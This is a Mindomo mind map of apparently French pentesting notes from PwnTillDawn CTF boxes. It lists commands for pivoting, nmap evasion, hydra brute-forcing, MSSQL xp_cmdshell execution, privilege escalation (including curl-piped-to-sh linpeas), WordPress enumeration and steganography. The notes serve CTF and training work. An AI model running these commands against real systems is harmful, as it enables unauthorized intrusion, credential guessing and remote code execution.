Categorías: Todo - web

por Anthony Guilbert hace 3 días

252

Pwntilldawn Mindmap FULL

The information provides a detailed overview of various techniques and tools used in cybersecurity, focusing on network scanning, steganography, pivoting and tunneling, privilege escalation, and web filtering.

Pwntilldawn Mindmap FULL

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations



Sur l'host

chisel server -port 7777 --reverse

Subtopic

Verifier ce qui écoute sur localhost

NMAP

Nmap Automator
nmap -sV -sC -T5 -p- ip
IDS/Firewalls
ncat -nv --source-port 53 10.129.2.28 50000
nmap -sS -Pn -n -p- --disable-arp-ping -D RND:3 --source-port 53 ip
nmap -sSU --script dns-nsid ip

Protocoles divers

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Test de se co pour la bannière
Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
MSSQL
EXEC xp_cmdshell 'powershell -encodedcommand ';

setup un listener avant

mssqlclient.py sequel.htb/sa:MSSQLP@ssw0rd!@10.10.11.51
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Login anon à vérif
NFS
showmount -e IP
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot
rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ipip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup
Dumb shell upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash

Transfer files - windows

target (windows)
Invoke-WebRequest -Uri http://10.10.16.35:7676/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
host (linux)
python3 -m http.server port

Find files

Hidden deleted file

Download file

Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'

Find file

(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }

tree /a /f
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
Other

grep -r pattern

search in files ( -recursive )

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

Privesc

Python Library Hijacking
Script qui tourne en root avec des imports de librairies
Metasploit
Upgrade session : sessions -u
Linux
LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

SUID

find / -perm -u=s -type f 2>/dev/null

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

searchsploit

searchsploit -m chemin

searchsploit xxxx

linpeas

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows
winpeas
msfconsole

multi/recon/localexploitsuggester

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
searchsploit -m xxxxx
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg

Mindomo

Acerca de Mindomo
Ayuda
Contacto
Precios
Galería pública de mapas mentales
Modelos de mapas mentales

Más información

Blog
Condiciones de uso
Política de privacidad
Seguridad
Accesibilidad
Política de seguridad

Preguntas Frecuentes

¿Qué es un mapa mental?
Crea un Mapa Mental Online
Ejemplos de Mapas Mentales
¿Qué es un mapa conceptual?
Creador de Mapas Conceptuales